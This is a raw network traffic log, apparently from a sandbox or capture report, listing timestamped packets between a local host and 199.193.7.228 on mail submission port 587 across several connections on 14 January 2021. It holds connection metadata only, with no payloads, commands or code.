Jan 14, 2021 08:02:00.535629988 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.535640955 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.535727024 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.535849094 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.536139965 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.536334038 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.536437988 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.536514997 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.633678913 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.633711100 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.634151936 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.634701967 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.634784937 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.674849033 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.674882889 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.674961090 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.674988031 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.675098896 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.675157070 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.675182104 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.675288916 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.675338030 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.675481081 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.676333904 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.721690893 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.721745968 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.721781969 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.721900940 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.722038984 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.725961924 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.725980997 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.725991011 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.726116896 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.726128101 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.726202011 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.726361990 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.726376057 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.726432085 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.726453066 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.726499081 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.726722956 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.824206114 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.824234009 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.824645996 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.824704885 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.824748039 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.865343094 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.865374088 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.865420103 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.865454912 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.865505934 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.865629911 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.865855932 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.866592884 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.866734028 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.912214994 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.912249088 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.912261009 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.912273884 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.912475109 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.912508011 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.914189100 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.916191101 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.916227102 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.916419983 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.916435003 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.916475058 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.916522026 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.916630983 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:00.916745901 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:00.916830063 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.014791965 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.014822960 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.014837027 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.015571117 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.016067982 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.055500984 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.055798054 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.055881023 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.055943012 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.056636095 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.056658983 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.056729078 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.102631092 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.102654934 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.102708101 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.102716923 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.104100943 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.106499910 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.106555939 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.106585979 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.106705904 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.106802940 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.106826067 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.107125998 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.107191086 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.205704927 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.205730915 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.205960035 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.206253052 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.206568003 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.245913029 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.245938063 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.246072054 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.246746063 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.246761084 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.246891975 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.246927023 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.292804003 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.293078899 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.294076920 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.294111013 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.294199944 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.294399023 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.296797991 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.296828985 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.296938896 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.297210932 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.297239065 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.297369957 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.297416925 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.297462940 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.298263073 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.396351099 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.396373987 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.396491051 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.398281097 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.398494959 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.398622036 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.436233044 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.436285973 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.436321974 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.437011003 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.483499050 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.484555960 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.484587908 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.484726906 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.487510920 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.487540007 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.487685919 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.487801075 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.487912893 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.488190889 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.588352919 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.588393927 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.588418961 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.588502884 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.604717016 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.633974075 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.659852982 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.736067057 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.825947046 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.827020884 CET	587	49815	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.827148914 CET	49815	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:01.927040100 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:01.928383112 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:02.119780064 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:02.120094061 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:02.310180902 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:02.310462952 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:02.311018944 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:02.333937883 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:02.501113892 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:02.501799107 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:02.524162054 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:02.524610996 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:02.524636030 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:02.524797916 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:02.526246071 CET	49814	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:02.692019939 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:02.692047119 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:02.692353964 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:02.694356918 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:02.695085049 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:02.716303110 CET	587	49814	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:02.884609938 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:02.884924889 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:02.885267973 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:02.885809898 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:02.886703968 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:03.076935053 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:03.078088045 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:03.079044104 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:03.269695044 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:03.273405075 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:03.285018921 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:03.475172043 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:03.481215000 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:03.481789112 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:03.671849012 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:03.725908041 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:03.726422071 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:03.779201984 CET	49817	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:03.916420937 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:03.917726040 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:03.918361902 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:03.918549061 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:03.918729067 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:03.918904066 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:03.919061899 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:03.919214964 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:03.921005011 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:03.969604969 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:03.969789028 CET	49817	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.108470917 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.108503103 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.108608007 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.108724117 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.108766079 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.108896971 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.108994007 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.109184980 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.109432936 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.109739065 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.109771967 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.111856937 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.112011909 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.112030029 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.162039042 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.163682938 CET	49817	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.298873901 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.298906088 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.299048901 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.299139023 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.299223900 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.299240112 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.299736977 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.299995899 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.302194118 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.302220106 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.302546024 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.302612066 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.353611946 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.353744030 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.354710102 CET	49817	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.489168882 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.489200115 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.489965916 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.490273952 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.490320921 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.490425110 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.492681980 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.496609926 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.544641972 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.547755957 CET	49817	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.680408955 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.680567026 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.680671930 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.680751085 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.681068897 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.681118011 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.682358027 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.682503939 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.682647943 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.682787895 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.682956934 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.683099031 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.683237076 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.683372021 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.683542013 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.683676004 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.683814049 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.683947086 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.684106112 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.684211016 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.684334993 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.686814070 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.686846018 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.686856031 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.737867117 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.737898111 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.738044977 CET	49817	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.741728067 CET	49817	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.742882013 CET	49817	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.871360064 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.871390104 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.871907949 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.871932983 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.872026920 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.872046947 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.872247934 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.872373104 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.872459888 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.872531891 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.872697115 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.872843027 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.872978926 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.873137951 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.873255968 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.873470068 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.873486996 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.873704910 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.873862028 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.873975039 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.874070883 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.874174118 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.882900000 CET	587	49816	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.931706905 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.931745052 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.932733059 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.933279991 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:04.936697960 CET	49817	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:04.941334009 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:05.127039909 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:05.128779888 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:05.130331993 CET	49817	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:05.320374012 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:05.323285103 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:05.331912994 CET	49817	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:05.522001982 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:05.524420023 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:05.524981976 CET	49817	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:05.715043068 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:05.772303104 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:05.774225950 CET	49817	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:05.964332104 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:05.965471983 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:05.966048002 CET	49817	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:05.966155052 CET	49817	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:05.966275930 CET	49817	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:05.966398001 CET	49817	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:05.966512918 CET	49817	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:05.966599941 CET	49817	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:05.966680050 CET	49817	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:05.966767073 CET	49817	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:06.156049967 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:06.156086922 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:06.156095028 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:06.156244040 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:06.156394958 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:06.156472921 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:06.164592028 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:06.174717903 CET	49817	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:06.350042105 CET	49816	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:06.351238966 CET	49818	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:06.364795923 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:06.365510941 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:06.365530014 CET	587	49817	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:06.370565891 CET	49817	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:06.370611906 CET	49817	587	192.168.2.3	199.193.7.228
